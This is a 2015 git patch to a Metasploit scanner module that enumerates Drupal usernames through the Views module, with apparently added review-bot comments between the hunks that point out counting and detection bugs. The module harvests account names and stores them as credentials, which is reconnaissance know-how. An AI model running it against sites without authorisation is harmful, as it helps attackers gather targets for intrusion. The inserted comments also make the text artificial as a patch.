From ed8f5456a47623f18d86c12c551f485bbae2cba6 Mon Sep 17 00:00:00 2001
From: Roberto Soares
Date: Sun, 4 Oct 2015 05:53:54 -0300
Subject: [PATCH] Fix bugs in drupal_views_user_enum.
---
 .../scanner/http/drupal_views_user_enum.rb | 56 +++++++++----------
 1 file changed, 28 insertions(+), 28 deletions(-)
diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index c78ded7771..a84a998808 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
 end
 def check_host(ip)
- res = send_request_cgi({
+ res = send_request_cgi(
 'uri' => base_uri,
 'method' => 'GET',
 'headers' => { 'Connection' => 'Close' }
- }, 25)
+ )
- if not res
+ unless res
 return Exploit::CheckCode::Unknown
- elsif res and res.body =~ /\Access denied/
+ end
+
+ if res.body.include?('Access denied')
 # This probably means the Views Module actually isn't installed
- vprint_error("#{rhost} - Access denied")
+ print_error("#{peer} - Access denied")
 return Exploit::CheckCode::Safe
- elsif res and res.message != 'OK' or res.body != '[ ]'
+ elsif res.message != 'OK' || res.body != '[ ]'
 return Exploit::CheckCode::Safe
 else
 return Exploit::CheckCode::Appears
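Review bot: The last `elsif` in check_host still compares the body to the exact literal `'[ ]'`, while the second hunk now reads the same endpoint with `JSON.parse`; if the server ever serializes the empty array as `[]` or appends a newline (not visible from this hunk), the check returns Safe, a false negative for anyone relying on it to audit their own site. A whitespace-tolerant form such as `elsif res.message != 'OK' || res.body.to_s.strip !~ /\A\[\s*\]\z/` would keep the two paths consistent. The 'Access denied' branch also moved from `vprint_error` to an unconditional `print_error`, which prints once per host on a range scan; `vprint_error("#{peer} - Access denied")` keeps the `peer` fix without the noise. The `if` chain and check_host itself close outside the hunk.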
@@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
 return
 end
- print_status("Begin enumerating users at #{ip}")
+ print_status("Begin enumerating users at #{vhost}")
 results = []
 ('a'..'z').each do |l|
 vprint_status("Iterating on letter: #{l}")
- res = send_request_cgi({
- 'uri' => base_uri+l,
+ res = send_request_cgi(
+ 'uri' => "#{base_uri}#{l}",
 'method' => 'GET',
 'headers' => { 'Connection' => 'Close' }
- }, 25)
+ )
- if (res and res.message == "OK")
- user_list = res.body.scan(/\w+/)
+ if res && res.message == 'OK'
+ begin
+ user_list = JSON.parse(res.body)
+ rescue JSON::ParserError => e
+ elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+ return []
+ end
 if user_list.empty?
- vprint_line("\tFound: Nothing")
+ vprint_error("Not found with: #{l}")
 else
- vprint_line("\tFound: #{user_list.inspect}")
- results << user_list
+ vprint_good("Found: #{user_list}")
+ results << user_list.flatten.uniq
 end
 else
- print_error("Unexpected results from server")
+ print_error("#{peer} - Unexpected results from server")
 return
 end
 end
- final_results = results.flatten.uniq
-
- print_status("Done. " + final_results.length.to_s + " usernames found...")
-
- final_results.each do |user|
+ print_status("Done. #{results.length} usernames found...")
+ results.flatten.uniq.each do |user|
 print_good("Found User: #{user}")
 report_cred(
 ip: Rex::Socket.getaddress(datastore['RHOST']),
 port: datastore['RPORT'],
 user: user,
- proof: base_uri+l
+ proof: base_uri
 )
 end
- # One username per line
- final_results = final_results * "\n"
-
+ results = results * "\n"
 p = store_loot(
 'drupal_user',
 'text/plain',
 Rex::Socket.getaddress(datastore['RHOST']),
- final_results.to_s,
+ results.to_s,
 'drupal_user.txt'
 )
-
 print_status("Usernames stored in: #{p}")
 end
-
 end
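Review bot: `results.length` in the "Done" line counts the letters that returned a match rather than usernames, because `results << user_list.flatten.uniq` appends one array per letter. The loot built by `results * "\n"` has the same root cause: the join flattens the nested arrays but never de-duplicates, so a name returned for more than one letter is stored repeatedly, and only the `report_cred` loop sees the unique list. Computing `users = results.flatten.uniq` once after the letter loop and using `users.length`, `users.each do |user|` and `users * "\n"` restores what the removed `final_results` provided. Separately, the `rescue JSON::ParserError` branch reports only through `elog` before `return []`, so the run stops with nothing on the console; a `print_error("#{peer} - Unexpected results from server")` before a bare `return` would match the other exit in this loop. run_host begins above this hunk.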